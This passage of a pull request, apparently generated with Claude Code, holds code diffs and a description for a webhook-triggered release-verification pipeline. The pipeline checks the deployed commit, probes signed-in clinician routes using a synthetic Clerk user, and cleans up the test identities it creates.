 - Retire the now-redundant fixed-`sleep 120` smoke test in `deploy-web.yml`
   (this system supersedes its intent).

--- a/package.json
+++ b/package.json
@@ -16,6 +16,7 @@
     "test": "turbo test",
     "build": "pnpm turbo build",
     "check:deploy": "node --experimental-strip-types scripts/deployment-integrity-check.ts",
+    "verify:release": "node --experimental-strip-types --disable-warning=MODULE_TYPELESS_PACKAGE_JSON --import ./scripts/release-monitor/register-ts-resolver.mjs scripts/release-verify.ts",
     "report:public-copy": "node scripts/report-public-entry-copy-sources.js",
     "test:backend:db": "bash scripts/backend-test-db.sh",
     "verify:production-convergence": "node --experimental-strip-types scripts/runtime/verify-production-convergence.ts",

--- a/scripts/deployment-integrity-check.ts
+++ b/scripts/deployment-integrity-check.ts
@@ -12,6 +12,7 @@ import { execSync } from 'node:child_process';
 import {
   parseRailwayStatus,
   evaluateIntegrity,
+  buildIntegrityReport,
   fetchGithubMainSha,
   probeHealth,
   EXPECTED_SERVICES,
@@ -29,22 +30,32 @@ function railwayStatusJson(): unknown | null {
 
 async function main() {
   const project = railwayStatusJson();
-  if (!project) {
-    console.error('deployment-integrity: could not read `railway status --json` (is the Railway CLI linked? `railway link`).');
+
+  // Source of Railway state, in priority: the linked CLI (local), else the
+  // Railway GraphQL API via RAILWAY_API_TOKEN (CI / GitHub Actions runner —
+  // there is no linked CLI there). buildIntegrityReport() also cross-checks
+  // GitHub main HEAD + service health, so the two branches yield the same shape.
+  let report;
+  if (project) {
+    const states = parseRailwayStatus(project);
+    const githubMainSha = await fetchGithubMainSha();
+
+    const health: Record<string, 'ok' | 'degraded' | 'unreachable'> = {};
+    await Promise.all(
+      EXPECTED_SERVICES.filter((s) => s.healthUrl).map(async (s) => {
+        health[s.name] = await probeHealth(s.healthUrl!);
+      }),
+    );
+
+    report = evaluateIntegrity({ states, githubMainSha, health, railwayReachable: true, nowMs: Date.now() });
+  } else if (process.env.RAILWAY_API_TOKEN) {
+    report = await buildIntegrityReport({ railwayToken: process.env.RAILWAY_API_TOKEN });
+  } else {
+    console.error(
+      'deployment-integrity: no `railway status --json` (CLI not linked — run `railway link`) and no RAILWAY_API_TOKEN for the GraphQL fallback.',
+    );
     process.exit(2);
   }
-
-  const states = parseRailwayStatus(project);
-  const githubMainSha = await fetchGithubMainSha();
-
-  const health: Record<string, 'ok' | 'degraded' | 'unreachable'> = {};
-  await Promise.all(
-    EXPECTED_SERVICES.filter((s) => s.healthUrl).map(async (s) => {
-      health[s.name] = await probeHealth(s.healthUrl!);
-    }),
-  );
-
-  const report = evaluateIntegrity({ states, githubMainSha, health, railwayReachable: true, nowMs: Date.now() });
 
   const icon = (ok: boolean) => (ok ? '🟢' : '🔴');
   console.log('\n  Deployment Integrity Check');

--- a/scripts/release-monitor/register-ts-resolver.mjs
+++ b/scripts/release-monitor/register-ts-resolver.mjs
@@ -1,0 +1,10 @@
+/**
+ * Registers the extensionless-TS resolve hook (`ts-resolver.mjs`) for the
+ * release-verify runner. Passed to Node via `--import` in the `verify:release`
+ * package script so `pnpm verify:release` needs no special flags at the call
+ * site. The hook module runs on a separate thread, hence the register()
+ * indirection (a loader cannot both register itself and be the hook).
+ */
+import { register } from 'node:module';
+
+register('./ts-resolver.mjs', import.meta.url);

--- a/scripts/release-monitor/ts-resolver.mjs
+++ b/scripts/release-monitor/ts-resolver.mjs
@@ -1,0 +1,29 @@
+/**
+ * ESM resolve hook: let `node --experimental-strip-types` load the release
+ * monitor's TypeScript libs, which use bundler-style EXTENSIONLESS relative
+ * imports (`./holderRoutes`) — the idiomatic style everywhere in apps/web.
+ *
+ * Node's ESM resolver requires explicit extensions for relative specifiers, so
+ * without this hook the runner would ERR_MODULE_NOT_FOUND on the first
+ * extensionless import. The hook rewrites a bare relative specifier to its `.ts`
+ * (or `/index.ts`) file when one exists, and otherwise defers to Node. This
+ * confines the "resolve like a bundler" glue to the standalone script runner and
+ * keeps the shared libs untouched. Registered via `register-ts-resolver.mjs`.
+ */
+import { existsSync } from 'node:fs';
+import { fileURLToPath, pathToFileURL } from 'node:url';
+import { dirname, resolve as resolvePath } from 'node:path';
+
+export async function resolve(specifier, context, nextResolve) {
+  if (specifier.startsWith('.') && !/\.[mc]?[jt]s$/.test(specifier)) {
+    const parent = context.parentURL ? fileURLToPath(context.parentURL) : process.cwd();
+    const baseDir = dirname(parent);
+    for (const candidate of [`${specifier}.ts`, `${specifier}/index.ts`]) {
+      const abs = resolvePath(baseDir, candidate);
+      if (existsSync(abs)) {
+        return nextResolve(pathToFileURL(abs).href, context);
+      }
+    }
+  }
+  return nextResolve(specifier, context);
+}

--- a/scripts/release-verify.ts
+++ b/scripts/release-verify.ts
@@ -122,13 +122,24 @@ async function main(): Promise<void> {
 
   const containerSha = await pollContainerSha(base, effectiveTarget, waitMs, 10_000);
 
-  const scDeps: SyntheticClinicianDeps = { fetchImpl: fetch, clerkSecretKey, fapiBase, appBase: base, runId };
-
   // Best-effort cleanup if the process is hard-killed (e.g. a GitHub step
   // timeout) before the normal finally runs — otherwise a hung run leaks a
-  // synthetic identity. The reconciliation sweep (see the doc) is the
-  // guaranteed backstop; this narrows the window.
+  // synthetic identity. `liveCreated` is updated INCREMENTALLY the instant each
+  // Clerk resource exists (onResourceCreated fires inside mint), so a kill
+  // mid-mint still cleans up a just-created user. The reconciliation sweep (see
+  // the doc) remains the guaranteed backstop for SIGKILL / the microsecond gap.
   let liveCreated: { userId: string | null; orgId: string | null } = { userId: null, orgId: null };
+  const scDeps: SyntheticClinicianDeps = {
+    fetchImpl: fetch,
+    clerkSecretKey,
+    fapiBase,
+    appBase: base,
+    runId,
+    onResourceCreated: (created) => {
+      liveCreated = created;
+    },
+  };
+
   let cleaningOnSignal = false;
   const onSignal = (sig: string) => {
     if (cleaningOnSignal) return;
@@ -144,9 +155,6 @@ async function main(): Promise<void> {
     containerSha,
     mainSha,
     targetSha,
-    onCreated: (created) => {
-      liveCreated = created;
-    },
     probeResolving: () => probeResolving(base),
     mint: () => mintClinicianSession(scDeps),
     warmUp: (s: ClinicianSession) => warmUpClinicianSession(scDeps, s),

--- a/scripts/release-verify.ts
+++ b/scripts/release-verify.ts
@@ -1,0 +1,155 @@
+/**
+ * release-verify — external post-deploy verification runner (`pnpm verify:release`).
+ *
+ * Runs on a GitHub Actions runner (an EXTERNAL vantage — never inside the web
+ * container it tests, since the P0 root cause was an in-container hairpin
+ * self-fetch). Wires real network I/O into the tested release-monitor libs,
+ * runs `pnpm check:deploy`, prints a report, writes JSON (`--out`/RELEASE_REPORT_OUT),
+ * and exits 0 (pass) / 1 (fail). Infra-agnostic — no GitHub token needed, so it
+ * also runs locally against prod.
+ *
+ * Invoked via the package script with the TS resolve hook:
+ *   node --experimental-strip-types --import ./scripts/release-monitor/register-ts-resolver.mjs scripts/release-verify.ts
+ *
+ * Env:
+ *   RELEASE_PROBE_BASE   deployed web origin (default https://vitalcv.com)
+ *   RELEASE_TARGET_SHA   deploy commit from the webhook client_payload (optional;
+ *                        when set, the SHA check is critical + we poll longer)
+ *   CLERK_SECRET_KEY     Clerk Backend API secret (required to mint a clinician)
+ *   CLERK_FAPI_URL       Clerk Frontend API base (default https://clerk.vitalcv.com)
+ *   RAILWAY_API_TOKEN    consumed by the check:deploy subprocess (GraphQL fallback)
+ *   RELEASE_SHA_WAIT_MS  SHA-poll budget override
+ *   RELEASE_REPORT_OUT   report output path (or pass --out <path>)
+ */
+import { execSync } from 'node:child_process';
+import { randomBytes } from 'node:crypto';
+import { writeFileSync } from 'node:fs';
+
+import { fetchGithubMainSha } from '../apps/web/lib/platform/deployment-integrity.ts';
+import { runReleaseVerification } from '../apps/web/lib/release-monitor/verify.ts';
+import {
+  cleanupClinician,
+  mintClinicianSession,
+  reachRoute,
+  refreshSessionToken,
+  warmUpClinicianSession,
+  type ClinicianSession,
+  type SyntheticClinicianDeps,
+} from '../apps/web/lib/release-monitor/syntheticClinician.ts';
+
+function argValue(flag: string): string | undefined {
+  const i = process.argv.indexOf(flag);
+  return i >= 0 ? process.argv[i + 1] : undefined;
+}
+
+function sleep(ms: number): Promise<void> {
+  return new Promise((r) => setTimeout(r, ms));
+}
+
+async function probeVersionCommit(base: string): Promise<string | null> {
+  try {
+    const res = await fetch(`${base}/api/version`, {
+      headers: { 'Cache-Control': 'no-cache' },
+      signal: AbortSignal.timeout(10000),
+    });
+    if (!res.ok) return null;
+    const body = (await res.json()) as { commit?: unknown };
+    return typeof body.commit === 'string' && body.commit ? body.commit : null;
+  } catch {
+    return null;
+  }
+}
+
+/** Poll /api/version until the container serves `target`, or the budget elapses. */
+async function pollContainerSha(
+  base: string,
+  target: string | null,
+  budgetMs: number,
+  intervalMs: number,
+): Promise<string | null> {
+  const deadline = Date.now() + budgetMs;
+  let last: string | null = null;
+  for (;;) {
+    last = await probeVersionCommit(base);
+    if (target && last && last.toLowerCase() === target.toLowerCase()) return last;
+    if (Date.now() >= deadline) return last;
+    await sleep(intervalMs);
+  }
+}
+
+async function probeResolving(base: string): Promise<{ status: number }> {
+  try {
+    const res = await fetch(`${base}/auth/resolving`, { redirect: 'manual', signal: AbortSignal.timeout(10000) });
+    return { status: res.status };
+  } catch {
+    return { status: 0 };
+  }
+}
+
+function runDeployCheck(): Promise<{ ok: boolean; detail: string }> {
+  const tailOf = (s: string) => s.trim().split('\n').slice(-3).join(' | ').slice(0, 400);
+  try {
+    const out = execSync('pnpm check:deploy', { encoding: 'utf8', stdio: ['ignore', 'pipe', 'pipe'] });
+    return Promise.resolve({ ok: true, detail: `check:deploy exit 0 — ${tailOf(out)}` });
+  } catch (err) {
+    const e = err as { status?: number; stdout?: Buffer | string; stderr?: Buffer | string };
+    const out = `${e.stdout ?? ''}${e.stderr ?? ''}`;
+    return Promise.resolve({ ok: false, detail: `check:deploy exit ${e.status ?? '?'} — ${tailOf(out) || 'no output'}` });
+  }
+}
+
+function icon(ok: boolean): string {
+  return ok ? '🟢' : '🔴';
+}
+
+async function main(): Promise<void> {
+  const base = (process.env.RELEASE_PROBE_BASE || 'https://vitalcv.com').replace(/\/+$/, '');
+  const outPath = argValue('--out') ?? process.env.RELEASE_REPORT_OUT;
+  const targetSha = process.env.RELEASE_TARGET_SHA?.trim() || null;
+  const clerkSecretKey = process.env.CLERK_SECRET_KEY || '';
+  const fapiBase = process.env.CLERK_FAPI_URL || 'https://clerk.vitalcv.com';
+  const runId = `${Date.now().toString(36)}-${randomBytes(3).toString('hex')}`;
+
+  const mainSha = await fetchGithubMainSha();
+  const effectiveTarget = targetSha ?? mainSha;
+  const waitMs = Number(process.env.RELEASE_SHA_WAIT_MS ?? (targetSha ? 300_000 : 20_000));
+
+  console.log(`\n  Release Verification`);
+  console.log('  ────────────────────');
+  console.log(`  base:   ${base}`);
+  console.log(`  target: ${effectiveTarget?.slice(0, 9) ?? 'unknown'} (${targetSha ? 'deploy commit' : 'main HEAD'})`);
+  console.log(`  waiting up to ${Math.round(waitMs / 1000)}s for the container to serve it...\n`);
+
+  const containerSha = await pollContainerSha(base, effectiveTarget, waitMs, 10_000);
+
+  const scDeps: SyntheticClinicianDeps = { fetchImpl: fetch, clerkSecretKey, fapiBase, appBase: base, runId };
+
+  const report = await runReleaseVerification({
+    base,
+    containerSha,
+    mainSha,
+    targetSha,
+    probeResolving: () => probeResolving(base),
+    mint: () => mintClinicianSession(scDeps),
+    warmUp: (s: ClinicianSession) => warmUpClinicianSession(scDeps, s),
+    refresh: (s: ClinicianSession) => refreshSessionToken(scDeps, s),
+    reach: (s: ClinicianSession, p: string) => reachRoute(scDeps, s, p),
+    runDeployCheck,
+    cleanup: (created) => cleanupClinician(scDeps, created),
+  });
+
+  for (const c of report.checks) {
+    console.log(`  ${icon(c.ok)} ${c.name.padEnd(26)} ${c.critical ? '' : '(reported) '}${c.detail}`);
+  }
+  console.log(`\n  cleanup: ${report.cleanup.attempted ? (report.cleanup.ok ? 'ok' : `ISSUE — ${report.cleanup.detail}`) : 'n/a'}`);
+  console.log(`\n  OVERALL: ${report.overall.toUpperCase()}${report.failedChecks.length ? ` (failed: ${report.failedChecks.join(', ')})` : ''}\n`);
+
+  if (outPath) {
+    writeFileSync(outPath, JSON.stringify(report, null, 2));
+    console.log(`  report written to ${outPath}\n`);
+  }
+
+  process.exit(report.overall === 'pass' ? 0 : 1);
+}
+
+void main();

--- a/scripts/release-verify.ts
+++ b/scripts/release-verify.ts
@@ -124,11 +124,29 @@ async function main(): Promise<void> {
 
   const scDeps: SyntheticClinicianDeps = { fetchImpl: fetch, clerkSecretKey, fapiBase, appBase: base, runId };
 
+  // Best-effort cleanup if the process is hard-killed (e.g. a GitHub step
+  // timeout) before the normal finally runs — otherwise a hung run leaks a
+  // synthetic identity. The reconciliation sweep (see the doc) is the
+  // guaranteed backstop; this narrows the window.
+  let liveCreated: { userId: string | null; orgId: string | null } = { userId: null, orgId: null };
+  let cleaningOnSignal = false;
+  const onSignal = (sig: string) => {
+    if (cleaningOnSignal) return;
+    cleaningOnSignal = true;
+    console.error(`\n  received ${sig} — attempting synthetic-identity cleanup before exit`);
+    void cleanupClinician(scDeps, liveCreated).finally(() => process.exit(1));
+  };
+  process.once('SIGTERM', () => onSignal('SIGTERM'));
+  process.once('SIGINT', () => onSignal('SIGINT'));
+
   const report = await runReleaseVerification({
     base,
     containerSha,
     mainSha,
     targetSha,
+    onCreated: (created) => {
+      liveCreated = created;
+    },
     probeResolving: () => probeResolving(base),
     mint: () => mintClinicianSession(scDeps),
     warmUp: (s: ClinicianSession) => warmUpClinicianSession(scDeps, s),


### PR DESCRIPTION
## What & why

Replaces the ephemeral session-level polling used during the signed-in-clinician P0 (`docs/product/signed-in-clinician-qa.md`, memory `signed_in_clinician_auth_p0.md`) with a permanent, **Railway-webhook-triggered** pipeline that verifies every web deploy end-to-end and records a **durable GitHub commit status** on the verified SHA. No Claude session in the loop.

Design + runbook: [`docs/deployment/release-monitoring.md`](docs/deployment/release-monitoring.md).

## Flow

Railway web deploy SUCCESS → webhook → `POST /api/internal/release-monitor/webhook` (thin bridge) → GitHub `repository_dispatch` → `.github/workflows/release-verify.yml` runs `pnpm verify:release` **on a runner** (external vantage — avoids the P0 in-container hairpin) → mints a synthetic clinician, reaches the six `/holder` routes with no `/auth/error` and no loop, checks the served SHA + `/auth/resolving`, runs `pnpm check:deploy`, cleans up → posts the `vitalcv/release-verified` commit status.

## Requirements coverage

1. ✅ Railway deploy webhook is the trigger (not session polling); `schedule` + manual are backstops.
2. ✅ deployed-SHA == main HEAD, `/auth/resolving` 200, synthetic signed-in clinician reaches all six `/holder` routes with no `/auth/error`/loop, then `pnpm check:deploy`.
3. ✅ Durable signal = GitHub commit status on the SHA (survives deploys, keyed by SHA, queryable).
4. ✅ New `GET /api/version` surfaces `RAILWAY_GIT_COMMIT_SHA` (full, `no-store`) — the web SHA source that didn't exist (`/api/health` exposes no commit).
5. ✅ Synthetic-clinician harness (Backend API → `sign_in_tokens` → FAPI ticket → org touch → `__session`) reused + tested; user/org cleaned up every run (in a `finally`).

## Verification done

- **41 new unit tests pass** — webhook parse/decision + handler auth/dispatch, harness step-sequencing + cleanup, nav classifier (auth_error/loop/sign_in), verify orchestration (cleanup-always), version endpoint.
- `tsc --noEmit`: **0 errors in new files** (the 118 repo-wide errors are the pre-existing "workspace packages not built" baseline). `next lint`: clean on new dirs. Existing `env.test.ts` still green.
- Runner **smoke-tested end-to-end** (module resolution via the ESM hook, GitHub main-HEAD fetch, correctly-formed Clerk request, `check:deploy` subprocess, report + exit code).
- `release-verify.yml` YAML validated.

## Owner wiring required before it goes live (documented in the doc)

- **Railway Project → Webhooks:** `https://vitalcv.com/api/internal/release-monitor/webhook?token=<secret>`
- **Railway web env:** `GITHUB_DISPATCH_TOKEN` (fine-grained PAT, contents:write), `RELEASE_WEBHOOK_TOKEN` (or reuse `CRON_SECRET`)
- **GitHub secrets:** `CLERK_SECRET_KEY`, `RAILWAY_API_TOKEN` (+ optional `CLERK_FAPI_URL`, `RELEASE_PROBE_BASE`)

## Notes for review

- `/auth/resolving` 404s until #507 merges — it's a **reported** check; the hard gate (real six-route reachability) is fix-shape-agnostic, so the monitor honestly reflects the live P0 state today and goes green automatically when a fix ships.
- Known residual: the backend has no delete API for the upserted `User` row, so each run leaves one orphan `@*.local` row (non-colliding per #504). Reconciliation sweep is a documented follow-up.
- The runner reuses the idiomatic (extensionless) web libs via a small ESM resolve hook confined to the script invocation — **no tsconfig or import-convention change**.

## Design Handoff References

No design handoff — infrastructure/ops change with no user-facing UI surface.

---

**Tier 2 — do not merge without review** (touches deploy/ops + the auth harness).

🤖 Generated with [Claude Code](https://claude.com/claude-code)